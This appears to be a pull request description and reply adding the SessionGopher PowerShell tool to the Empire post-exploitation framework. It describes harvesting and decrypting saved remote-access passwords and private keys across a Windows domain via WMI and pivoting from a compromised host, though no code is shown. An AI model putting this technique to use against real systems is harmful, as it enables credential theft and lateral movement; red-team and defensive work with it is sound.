SessionGopher: PowerShell RDP, WinSCP, PuTTY, SuperPuTTy, FileZilla, .ppk, .rdp, .sdtid session extractor & password decryptor

[Arvanaghi]

Quietly digging up saved sessions and passwords for RDP, WinSCP, FileZilla, PuTTY, and SuperPuTTY

SessionGopher is a purely PowerShell tool that finds and decrypts saved session information for remote access tools. It uses WMI so it can be run remotely, and its best use case is finding Unix systems and jump boxes.

It works by querying the HKEY_USERS hive for all users who have logged onto a domain-joined box at some point. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information and passwords. It has a built-in WinSCP password decryptor, and also deobfuscates and extracts FileZilla and SuperPuTTY passwords. When run in Thorough mode, it searches all drives for PuTTY private key files (.ppk) and extracts all relevant private key information, including the key itself, as well as for Remote Desktop (.rdp) and RSA (.sdtid) files.

SessionGopher has remote access built-in using WMI. You to search the entire domain for these artifacts, or an input list you provide it.

Empire Integration

From this Empire module, you can extract all the saved session data from the beaconing host. Or, you can use that host to pivot to another host whose saved sessions and credentials you wish to extract by using the Target argument. Similarly, you can run SessionGopher across the entire domain using AllDomain. SessionGopher will use the security context of the beaconing user to run unless you explicitly provide domain credentials with the u and p flags.

Github: https://github.com/fireeye/SessionGopher
Blog post: Using the Registry to Discover Unix Systems and Jump Boxes

Let me know if there's any question or comments I can address.

[rvrsh3ll]

Tested working. Great tool and thanks for the PR!